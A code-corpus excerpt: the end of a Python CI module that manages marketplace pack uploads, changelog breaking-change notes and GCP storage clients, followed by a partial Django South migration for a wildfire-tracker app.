logging.error(f"Found changed/added author image in content repo for {self._pack_name} pack but "
f"image does not exist in build bucket in path {build_author_image_path}.")
return False
else:
logging.info(f"No added/modified author image was detected in {self._pack_name} pack.")
return True
def cleanup(self):
""" Finalization action, removes extracted pack folder.
"""
if os.path.exists(self._pack_path):
shutil.rmtree(self._pack_path)
logging.info(f"Cleanup {self._pack_name} pack from: {self._pack_path}")
def is_changelog_exists(self):
""" Indicates whether the local changelog of a given pack exists or not
Returns:
bool: The answer
"""
return os.path.isfile(os.path.join(self._pack_path, Pack.CHANGELOG_JSON))
def is_failed_to_upload(self, failed_packs_dict):
"""
Checks if the pack was failed to upload in Prepare Content step in Create Instances job
Args:
failed_packs_dict (dict): The failed packs file
Returns:
bool: Whether the operation succeeded.
str: The pack's failing status
"""
if self._pack_name in failed_packs_dict:
return True, failed_packs_dict[self._pack_name].get('status')
else:
return False, str()
def is_integration_image(self, file_path: str):
""" Indicates whether a file_path is an integration image or not
Args:
file_path (str): The file path
Returns:
bool: True if the file is an integration image or False otherwise
"""
return all([
file_path.startswith(os.path.join(PACKS_FOLDER, self._pack_name)),
file_path.endswith('.png'),
'image' in os.path.basename(file_path.lower()),
os.path.basename(file_path) != Pack.AUTHOR_IMAGE_NAME
])
def is_author_image(self, file_path: str):
""" Indicates whether a file_path is an author image or not
Args:
file_path (str): The file path
Returns:
bool: True if the file is an author image or False otherwise
"""
return file_path == os.path.join(PACKS_FOLDER, self._pack_name, Pack.AUTHOR_IMAGE_NAME)
def is_unified_integration(self, file_path: str):
""" Indicates whether a file_path is a unified integration yml file or not
Args:
file_path (str): The file path
Returns:
bool: True if the file is a unified integration or False otherwise
"""
return all([
file_path.startswith(os.path.join(PACKS_FOLDER, self._pack_name, PackFolders.INTEGRATIONS.value)),
os.path.basename(os.path.dirname(file_path)) == PackFolders.INTEGRATIONS.value,
os.path.basename(file_path).startswith('integration'),
os.path.basename(file_path).endswith('.yml')
])
def add_bc_entries_if_needed(self, release_notes_dir: str, changelog: Dict[str, Any]) -> None:
"""
Receives the changelog and checks whether each changelog entry contains a BC version (as a changelog entry
might aggregate a few RN versions, it is enough that at least one of the versions is BC).
Checking whether an RN is BC is done as follows:
1) Check if the RN has a corresponding config file, e.g. 1_0_1.md has a corresponding 1_0_1.json file.
2) If it does, check whether its `breakingChanges` field is true.
If such a version exists, a true value is added to the entry's 'breakingChanges' field.
If the JSON file also has `breakingChangesNotes` configured, a `breakingChangesNotes` field is added to the
changelog entry as well.
This function iterates every entry in changelog because it takes into consideration four scenarios:
a) Entry without breaking changes, changes to entry with breaking changes (because at least one of the
versions in the entry was marked as breaking changes).
b) Entry without breaking changes, does not change.
c) Entry with breaking changes, changes to entry without breaking changes (because all the BC versions
corresponding to the changelog entry were re-marked as not BC).
d) Entry with breaking changes, does not change.
Args:
release_notes_dir (str): RN dir path.
changelog (Dict[str, Any]): Changelog data represented as a dict.
Returns:
(None): Modifies changelog, adds bool value to 'breakingChanges' and `breakingChangesNotes` fields to every
changelog entry, according to the logic described above.
"""
if not os.path.exists(release_notes_dir):
return
bc_version_to_text: Dict[str, Optional[str]] = self._breaking_changes_versions_to_text(release_notes_dir)
loose_versions: List[LooseVersion] = [LooseVersion(bc_ver) for bc_ver in bc_version_to_text]
predecessor_version: LooseVersion = LooseVersion('0.0.0')
for changelog_entry in sorted(changelog.keys(), key=LooseVersion):
rn_loose_version: LooseVersion = LooseVersion(changelog_entry)
if bc_versions := self._changelog_entry_bc_versions(predecessor_version, rn_loose_version, loose_versions,
bc_version_to_text):
logging.info(f'Changelog entry {changelog_entry} contains BC versions')
changelog[changelog_entry]['breakingChanges'] = True
if bc_text := self._calculate_bc_text(release_notes_dir, bc_versions):
changelog[changelog_entry]['breakingChangesNotes'] = bc_text
else:
changelog[changelog_entry].pop('breakingChangesNotes', None)
else:
changelog[changelog_entry].pop('breakingChanges', None)
predecessor_version = rn_loose_version
def _calculate_bc_text(self, release_notes_dir: str, bc_version_to_text: Dict[str, Optional[str]]) -> Optional[str]:
"""
Receives BC versions to text dict for current changelog entry. Calculates text for BC entry.
Args:
release_notes_dir (str): RN dir path.
bc_version_to_text (Dict[str, Optional[str]): {bc version, bc_text}
Returns:
(Optional[str]): Text for entry if such was added.
If none is returned, server will list the full RN as the BC notes instead.
"""
# Handle cases of one BC version in entry.
if len(bc_version_to_text) == 1:
return list(bc_version_to_text.values())[0]
# Handle cases of two or more BC versions in entry.
text_of_bc_versions, bc_without_text = self._split_bc_versions_with_and_without_text(bc_version_to_text)
# Case one: Not even one BC version contains breaking text.
if len(text_of_bc_versions) == 0:
return None
# Case two: Only part of BC versions contains breaking text.
elif len(text_of_bc_versions) < len(bc_version_to_text):
return self._handle_many_bc_versions_some_with_text(release_notes_dir, text_of_bc_versions, bc_without_text)
# Case three: All BC versions contain text.
else:
# Important: Currently, aggregated BC texts are simply concatenated.
# In the future this might need to be re-thought.
return '\n'.join(bc_version_to_text.values()) # type: ignore[arg-type]
def _handle_many_bc_versions_some_with_text(self, release_notes_dir: str, text_of_bc_versions: List[str],
bc_versions_without_text: List[str], ) -> str:
"""
Calculates text for changelog entry where some BC versions contain text and some don't.
Important: Currently, aggregated BC texts are simply concatenated (and if a BC version does not have a BC text,
the whole RN is concatenated instead). In the future this might need to be re-thought.
Args:
release_notes_dir (str): RN dir path.
text_of_bc_versions (List[str]): List of texts of the BC versions that have text.
bc_versions_without_text (List[str]): List of BC versions without text.
Returns:
(str): Text for BC entry.
"""
bc_with_text_str = '\n'.join(text_of_bc_versions)
rn_file_names_without_text = [f'''{bc_version.replace('.', '_')}.md''' for
bc_version in bc_versions_without_text]
other_rn_text: str = self._get_release_notes_concat_str(release_notes_dir, rn_file_names_without_text)
if not other_rn_text:
logging.error('No RN text, although text was expected to be found for versions'
f' {rn_file_names_without_text}.')
return f'{bc_with_text_str}{other_rn_text}'
@staticmethod
def _get_release_notes_concat_str(release_notes_dir: str, rn_file_names: List[str]) -> str:
"""
Concat all RN data found in given `rn_file_names`.
Args:
release_notes_dir (str): RN dir path.
rn_file_names (List[str]): List of all RN files to concat their data.
Returns:
(str): Concat RN data
"""
concat_str: str = ''
for rn_file_name in rn_file_names:
rn_file_path = os.path.join(release_notes_dir, rn_file_name)
with open(rn_file_path, 'r') as f:
# Will make the concat string start with new line on purpose.
concat_str = f'{concat_str}\n{f.read()}'
return concat_str
@staticmethod
def _split_bc_versions_with_and_without_text(bc_versions: Dict[str, Optional[str]]) -> Tuple[List[str], List[str]]:
"""
Splits BC versions into a tuple of (texts of the BC versions that contain text, BC versions that do not contain text).
Args:
bc_versions (Dict[str, Optional[str]): BC versions mapped to text if exists.
Returns:
(Tuple[List[str], List[str]]): (text of bc versions with text, bc_versions_without_text).
"""
text_of_bc_versions_with_text: List[str] = []
bc_versions_without_text: List[str] = []
for bc_version, bc_text in bc_versions.items():
if bc_text:
text_of_bc_versions_with_text.append(bc_text)
else:
bc_versions_without_text.append(bc_version)
return text_of_bc_versions_with_text, bc_versions_without_text
@staticmethod
def _breaking_changes_versions_to_text(release_notes_dir: str) -> Dict[str, Optional[str]]:
"""
Calculates every BC version in given RN dir and maps it to text if exists.
Currently, text from a BC version is calculated in the following way:
- If RN has `breakingChangesNotes` entry in its corresponding config file, then use the value of that field
as the text of the BC to be represented.
- Else, use the whole RN text as BC text.
Args:
release_notes_dir (str): RN dir path.
Returns:
(Dict[str, Optional[str]]): {dotted_version, text}.
"""
bc_version_to_text: Dict[str, Optional[str]] = dict()
# Get all config files in RN dir
rn_config_file_names = filter_dir_files_by_extension(release_notes_dir, '.json')
for file_name in rn_config_file_names:
file_data: Dict = load_json(os.path.join(release_notes_dir, file_name))
# Check if version is BC
if file_data.get('breakingChanges'):
# Processing name for easier calculations later on
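# e.g. "1_0_1.json" -> "1.0.1" (assuming underscore_file_name_to_dotted_version performs this conversion)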
processed_name: str = underscore_file_name_to_dotted_version(file_name)
bc_version_to_text[processed_name] = file_data.get('breakingChangesNotes')
return bc_version_to_text
@staticmethod
def _changelog_entry_bc_versions(predecessor_version: LooseVersion, rn_version: LooseVersion,
breaking_changes_versions: List[LooseVersion],
bc_version_to_text: Dict[str, Optional[str]]) -> Dict[str, Optional[str]]:
"""
Gets all BC versions of given changelog entry, every BC s.t predecessor_version < BC version <= rn_version.
Args:
predecessor_version (LooseVersion): Predecessor version in numeric version order.
rn_version (LooseVersion): RN version of current processed changelog entry.
breaking_changes_versions (List[LooseVersion]): List of BC versions.
bc_version_to_text (Dict[str, Optional[str]): List of all BC to text in the given RN dir.
Returns:
Dict[str, Optional[str]]: Partial list of `bc_version_to_text`, containing only relevant versions between
given versions.
"""
return {bc_ver.vstring: bc_version_to_text.get(bc_ver.vstring) for bc_ver in breaking_changes_versions if
predecessor_version < bc_ver <= rn_version}
# HELPER FUNCTIONS
def get_upload_data(packs_results_file_path: str, stage: str) -> Tuple[dict, dict, dict, dict]:
""" Loads the packs_results.json file to get the successful and failed packs together with uploaded images dicts
Args:
packs_results_file_path (str): The path to the file
stage (str): can be BucketUploadFlow.PREPARE_CONTENT_FOR_TESTING or
BucketUploadFlow.UPLOAD_PACKS_TO_MARKETPLACE_STORAGE
Returns:
dict: The successful packs dict
dict: The failed packs dict
dict : The successful private packs dict
dict: The images data dict
"""
if os.path.exists(packs_results_file_path):
packs_results_file = load_json(packs_results_file_path)
stage_data: dict = packs_results_file.get(stage, {})
successful_packs_dict = stage_data.get(BucketUploadFlow.SUCCESSFUL_PACKS, {})
failed_packs_dict = stage_data.get(BucketUploadFlow.FAILED_PACKS, {})
successful_private_packs_dict = stage_data.get(BucketUploadFlow.SUCCESSFUL_PRIVATE_PACKS, {})
images_data_dict = stage_data.get(BucketUploadFlow.IMAGES, {})
return successful_packs_dict, failed_packs_dict, successful_private_packs_dict, images_data_dict
return {}, {}, {}, {}
def store_successful_and_failed_packs_in_ci_artifacts(packs_results_file_path: str, stage: str, successful_packs: list,
failed_packs: list, updated_private_packs: list,
images_data: dict = None):
""" Write the successful and failed packs to the correct section in the packs_results.json file
Args:
packs_results_file_path (str): The path to the pack_results.json file
stage (str): can be BucketUploadFlow.PREPARE_CONTENT_FOR_TESTING or
BucketUploadFlow.UPLOAD_PACKS_TO_MARKETPLACE_STORAGE
successful_packs (list): The list of all successful packs
failed_packs (list): The list of all failed packs
updated_private_packs (list) : The list of all private packs that were updated
images_data (dict): A dict containing all images that were uploaded for each pack
"""
packs_results = load_json(packs_results_file_path)
packs_results[stage] = dict()
if failed_packs:
failed_packs_dict = {
BucketUploadFlow.FAILED_PACKS: {
pack.name: {
BucketUploadFlow.STATUS: pack.status,
BucketUploadFlow.AGGREGATED: pack.aggregation_str if pack.aggregated and pack.aggregation_str
else "False"
} for pack in failed_packs
}
}
packs_results[stage].update(failed_packs_dict)
logging.debug(f"Failed packs {failed_packs_dict}")
if successful_packs:
successful_packs_dict = {
BucketUploadFlow.SUCCESSFUL_PACKS: {
pack.name: {
BucketUploadFlow.STATUS: pack.status,
BucketUploadFlow.AGGREGATED: pack.aggregation_str if pack.aggregated and pack.aggregation_str
else "False",
BucketUploadFlow.LATEST_VERSION: pack.latest_version
} for pack in successful_packs
}
}
packs_results[stage].update(successful_packs_dict)
logging.debug(f"Successful packs {successful_packs_dict}")
if updated_private_packs:
successful_private_packs_dict: dict = {
BucketUploadFlow.SUCCESSFUL_PRIVATE_PACKS: {pack_name: {} for pack_name in updated_private_packs}
}
packs_results[stage].update(successful_private_packs_dict)
logging.debug(f"Successful private packs {successful_private_packs_dict}")
if images_data:
packs_results[stage].update({BucketUploadFlow.IMAGES: images_data})
logging.debug(f"Images data {images_data}")
if packs_results:
json_write(packs_results_file_path, packs_results)
def load_json(file_path: str) -> dict:
""" Reads and loads json file.
Args:
file_path (str): full path to json file.
Returns:
dict: loaded json file.
"""
try:
if file_path and os.path.exists(file_path):
with open(file_path, 'r') as json_file:
result = json.load(json_file)
else:
result = {}
return result
except json.decoder.JSONDecodeError:
return {}
def json_write(file_path: str, data: Union[list, dict]):
""" Writes given data to a json file
Args:
file_path: The file path
data: The data to write
"""
with open(file_path, "w") as f:
f.write(json.dumps(data, indent=4))
def init_storage_client(service_account=None):
"""Initialize google cloud storage client.
In case of local dev usage the client will be initialized with user default credentials.
Otherwise, client will be initialized from service account json that is stored in CircleCI.
Args:
service_account (str): full path to service account json.
Return:
storage.Client: initialized google cloud storage client.
"""
if service_account:
storage_client = storage.Client.from_service_account_json(service_account)
logging.info("Created gcp service account")
return storage_client
else:
# in case of local dev use, ignore the warning about not using a service account.
warnings.filterwarnings("ignore", message=google.auth._default._CLOUD_SDK_CREDENTIALS_WARNING)
credentials, project = google.auth.default()
storage_client = storage.Client(credentials=credentials, project=project)
logging.info("Created gcp private account")
return storage_client
def input_to_list(input_data, capitalize_input=False):
""" Helper function for handling input list or str from the user.
Args:
input_data (list or str): input from the user to handle.
capitalize_input (bool): whether to capitalize the input list data or not.
Returns:
list: returns the original list or list that was split by comma.
"""
input_data = input_data if input_data else []
input_data = input_data if isinstance(input_data, list) else [s for s in input_data.split(',') if s]
if capitalize_input:
return [" ".join([w.title() if w.islower() else w for w in i.split()]) for i in input_data]
else:
return input_data
def get_valid_bool(bool_input):
""" Converts and returns valid bool.
Returns:
bool: converted bool input.
"""
return bool(strtobool(bool_input)) if isinstance(bool_input, str) else bool_input
def convert_price(pack_id, price_value_input=None):
""" Converts to integer value price input. In case no price input provided, return zero as price.
Args:
pack_id (str): pack unique identifier.
price_value_input (str): price string to convert.
Returns:
int: converted to int pack price.
"""
try:
if not price_value_input:
return 0 # in case no price was supplied, return 0
else:
return int(price_value_input) # otherwise convert to int and return result
except Exception:
logging.exception(f"{pack_id} pack price is not valid. The price was set to 0.")
return 0
def get_updated_server_version(current_string_version, compared_content_item, pack_name):
""" Compares two semantic server versions and returns the higher version between them.
Args:
current_string_version (str): current string version.
compared_content_item (dict): compared content item entity.
pack_name (str): the pack name (id).
Returns:
str: the lower of the two compared versions, i.e. the updated minimum server version.
"""
lower_version_result = current_string_version
try:
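# "99.99.99" acts as a sentinel: items without a fromversion never lower the pack's minimum server version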
compared_string_version = compared_content_item.get('fromversion') or compared_content_item.get(
'fromVersion') or "99.99.99"
current_version, compared_version = LooseVersion(current_string_version), LooseVersion(compared_string_version)
if current_version > compared_version:
lower_version_result = compared_string_version
except Exception:
content_item_name = compared_content_item.get('name') or compared_content_item.get(
'display') or compared_content_item.get('id') or compared_content_item.get('details', '')
logging.exception(f"{pack_name} failed in version comparison of content item {content_item_name}.")
finally:
return lower_version_result
def get_content_git_client(content_repo_path: str):
""" Initializes content repo client.
Args:
content_repo_path (str): content repo full path
Returns:
git.repo.base.Repo: content repo object.
"""
return git.Repo(content_repo_path)
def get_recent_commits_data(content_repo: Any, index_folder_path: str, is_bucket_upload_flow: bool,
is_private_build: bool = False, circle_branch: str = "master"):
""" Returns recent commits hashes (of head and remote master)
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path (str): the path to the local index folder
is_bucket_upload_flow (bool): indicates whether its a run of bucket upload flow or regular build
is_private_build (bool): indicates whether its a run of private build or not
circle_branch (str): CircleCi branch of current build
Returns:
str: last commit hash of head.
str: previous commit depending on the flow the script is running
"""
return content_repo.head.commit.hexsha, get_previous_commit(content_repo, index_folder_path, is_bucket_upload_flow,
is_private_build, circle_branch)
def get_previous_commit(content_repo, index_folder_path, is_bucket_upload_flow, is_private_build, circle_branch):
""" If running in bucket upload workflow we want to get the commit in the index which is the index
We've last uploaded to production bucket. Otherwise, we are in a commit workflow and the diff should be from the
head of origin/master
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path (str): the path to the local index folder
        is_bucket_upload_flow (bool): indicates whether it's a run of the bucket upload flow or a regular build
        is_private_build (bool): indicates whether it's a run of a private build or not
circle_branch (str): CircleCi branch of current build
Returns:
        str: the previous commit, depending on the flow the script is running in
"""
if is_bucket_upload_flow:
return get_last_upload_commit_hash(content_repo, index_folder_path)
elif is_private_build:
previous_master_head_commit = content_repo.commit('origin/master~1').hexsha
logging.info(f"Using origin/master HEAD~1 commit hash {previous_master_head_commit} to diff with.")
return previous_master_head_commit
else:
if circle_branch == 'master':
head_str = "HEAD~1"
            # if circle branch is master then the current commit is origin/master HEAD, so we need to diff with HEAD~1
previous_master_head_commit = content_repo.commit('origin/master~1').hexsha
else:
head_str = "HEAD"
# else we are on a regular branch and the diff should be done with origin/master HEAD
previous_master_head_commit = content_repo.commit('origin/master').hexsha
logging.info(f"Using origin/master {head_str} commit hash {previous_master_head_commit} to diff with.")
return previous_master_head_commit
def get_last_upload_commit_hash(content_repo, index_folder_path):
"""
Returns the last origin/master commit hash that was uploaded to the bucket
Args:
content_repo (git.repo.base.Repo): content repo object.
index_folder_path: The path to the index folder
Returns:
The commit hash
"""
inner_index_json_path = os.path.join(index_folder_path, f'{GCPConfig.INDEX_NAME}.json')
if not os.path.exists(inner_index_json_path):
logging.critical(f"{GCPConfig.INDEX_NAME}.json not found in {GCPConfig.INDEX_NAME} folder")
sys.exit(1)
else:
inner_index_json_file = load_json(inner_index_json_path)
if 'commit' in inner_index_json_file:
last_upload_commit_hash = inner_index_json_file['commit']
logging.info(f"Retrieved the last commit that was uploaded to production: {last_upload_commit_hash}")
else:
logging.critical(f"No commit field in {GCPConfig.INDEX_NAME}.json, content: {str(inner_index_json_file)}")
sys.exit(1)
try:
last_upload_commit = content_repo.commit(last_upload_commit_hash).hexsha
logging.info(f"Using commit hash {last_upload_commit} from index.json to diff with.")
return last_upload_commit
except Exception as e:
logging.critical(f'Commit {last_upload_commit_hash} in {GCPConfig.INDEX_NAME}.json does not exist in content '
f'repo. Additional info:\n {e}')
sys.exit(1)
def is_ignored_pack_file(modified_file_path_parts):
""" Indicates whether a pack file needs to be ignored or not.
Args:
modified_file_path_parts: The modified file parts, e.g. if file path is "a/b/c" then the
parts list is ["a", "b", "c"]
Returns:
(bool): True if the file should be ignored, False otherwise
"""
for file_suffix in PackIgnored.ROOT_FILES:
if file_suffix in modified_file_path_parts:
return True
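    # Inside specific pack folders, either ignore every file (empty suffix list) or only files matching the listed suffixes.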
for pack_folder, file_suffixes in PackIgnored.NESTED_FILES.items():
if pack_folder in modified_file_path_parts:
if not file_suffixes: # Ignore all pack folder files
return True
for file_suffix in file_suffixes:
if file_suffix in modified_file_path_parts[-1]:
return True
for pack_folder in PackIgnored.NESTED_DIRS:
if pack_folder in modified_file_path_parts:
pack_folder_path = os.sep.join(modified_file_path_parts[:modified_file_path_parts.index(pack_folder) + 1])
file_path = os.sep.join(modified_file_path_parts)
for folder_path in [f for f in glob.glob(os.path.join(pack_folder_path, '*/*')) if os.path.isdir(f)]:
# Checking for all 2nd level directories. e.g. test_data directory
if file_path.startswith(folder_path):
return True
return False
def filter_dir_files_by_extension(release_notes_dir: str, extension: str) -> List[str]:
"""
Receives path to RN dir, filters only files in RN dir corresponding to the extension.
Needed because RN directory will be extended to contain JSON files for configurations,
see 'release_notes_bc_calculator.py'
Args:
release_notes_dir (str): Path to RN dir
extension (str): Extension to filter by.
Returns:
(List[str]): List of all of the files in directory corresponding to the extension.
"""
return [file_name for file_name in os.listdir(release_notes_dir) if file_name.endswith(extension)]
def is_the_only_rn_in_block(release_notes_dir: str, version: str, changelog: dict):
"""
    Check whether the given version is a key of an aggregated changelog block, i.e. whether its value in the changelog
    does not contain other release notes that were aggregated in previous uploads.
    If that is the case, the release note immediately preceding it in the changelog will be equal to the one in the
    release notes directory; otherwise, versions that exist in the release notes directory are missing from the
    changelog because they were aggregated. This function asserts exactly that.
Note: The comparison is done against the release notes directory to avoid cases where there are missing versions in
the changelog due to inconsistent versions numbering, such as major version bumps. (For example, if the versions
1.2.7 and 1.3.0 are two consecutive keys in the changelog, we need to determine if 1.3.0 has aggregated the versions
1.2.8-1.3.0, OR 1.3.0 is the consecutive version right after 1.2.7 but is a major bump. in order to check that, we
check it against the files in the release notes directory.)
Args:
release_notes_dir: the path to the release notes dir.
version (str): the wanted version.
changelog (dict): the changelog from the production bucket.
Returns:
True if this version's value in the changelog is not an aggregated release notes block. False otherwise.
"""
if not changelog.get(version):
return False
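    # The version is a standalone block only if the highest RN version below it on disk matches the highest
    # changelog key below it - otherwise some release notes in between were aggregated into this block.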
all_rn_versions = []
lowest_version = [LooseVersion('1.0.0')]
for filename in filter_dir_files_by_extension(release_notes_dir, '.md'):
current_version = underscore_file_name_to_dotted_version(filename)
all_rn_versions.append(LooseVersion(current_version))
lower_versions_all_versions = [item for item in all_rn_versions if item < version] + lowest_version
lower_versions_in_changelog = [LooseVersion(item) for item in changelog.keys() if
LooseVersion(item) < version] + lowest_version
return max(lower_versions_all_versions) == max(lower_versions_in_changelog)
def underscore_file_name_to_dotted_version(file_name: str) -> str:
"""
Receives file name with expected format of x_x_x<extension>, and transforms it to dotted string.
Examples
- underscore_file_name_to_dotted_version(1_2_3.md) --> 1.2.3
- underscore_file_name_to_dotted_version(1_4_2.json) --> 1.4.2
Args:
file_name (str): File name.
Returns:
(str): Dotted version of file name
"""
return os.path.splitext(file_name)[0].replace('_', '.')
| VirusTotal/content | Tests/Marketplace/marketplace_services.py | Python | mit | 150,166 | 0.004761 |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'WildfireDisplayContent.content_type'
db.add_column('calfire_tracker_wildfiredisplaycontent', 'content_type',
self.gf('django.db.models.fields.CharField')(default='Display Content', max_length=1024, null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'WildfireDisplayContent.content_type'
db.delete_column('calfire_tracker_wildfiredisplaycontent', 'content_type')
models = {
'calfire_tracker.calwildfire': {
'Meta': {'object_name': 'CalWildfire'},
'acres_burned': ('django.db.models.fields.IntegerField', [], {'max_length': '8', 'null': 'True', 'blank': 'True'}),
'administrative_unit': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'air_quality_rating': ('django.db.models.fields.IntegerField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'asset_host_image_id': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'asset_photo_credit': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'asset_url_link': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'cause': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'computed_location': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'conditions': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'containment_percent': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'cooperating_agencies': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'county': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'county_slug': ('django.db.models.fields.SlugField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'created_fire_id': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'current_situation': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'damage_assessment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'data_source': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'date_time_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'evacuations': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fire_name': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'fire_slug': ('django.db.models.fields.SlugField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'historical_narrative': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'injuries': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'null': 'True', 'blank': 'True'}),
'last_saved': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'last_scraped': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'location_geocode_error': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location_latitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'location_longitude': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'more_info': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'perimeters_image': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'phone_numbers': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'promoted_fire': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'road_closures': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'school_closures': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'structures_destroyed': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'structures_threatened': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'total_airtankers': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_dozers': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_fire_crews': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_fire_engines': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_fire_personnel': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_helicopters': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'total_water_tenders': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'training': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'twitter_hashtag': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
'update_lockout': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'year': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfireannualreview': {
'Meta': {'object_name': 'WildfireAnnualReview'},
'acres_burned': ('django.db.models.fields.IntegerField', [], {'max_length': '8', 'null': 'True', 'blank': 'True'}),
'administrative_unit': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'data_source': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'date_range_beginning': ('django.db.models.fields.DateTimeField', [], {}),
'date_range_end': ('django.db.models.fields.DateTimeField', [], {}),
'dollar_damage': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '15', 'decimal_places': '2', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'injuries': ('django.db.models.fields.CharField', [], {'max_length': '2024', 'null': 'True', 'blank': 'True'}),
'jurisdiction': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'last_saved': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'number_of_fires': ('django.db.models.fields.IntegerField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'structures_destroyed': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'structures_threatened': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.IntegerField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfiredisplaycontent': {
'Meta': {'object_name': 'WildfireDisplayContent'},
'content_headline': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'content_link': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.CharField', [], {'default': "'Display Content'", 'max_length': '1024', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_saved': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfiretweet': {
'Meta': {'object_name': 'WildfireTweet'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tweet_created_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'tweet_hashtag': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_id': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_profile_image_url': ('django.db.models.fields.URLField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_screen_name': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'tweet_text': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'calfire_tracker.wildfireupdate': {
'Meta': {'object_name': 'WildfireUpdate'},
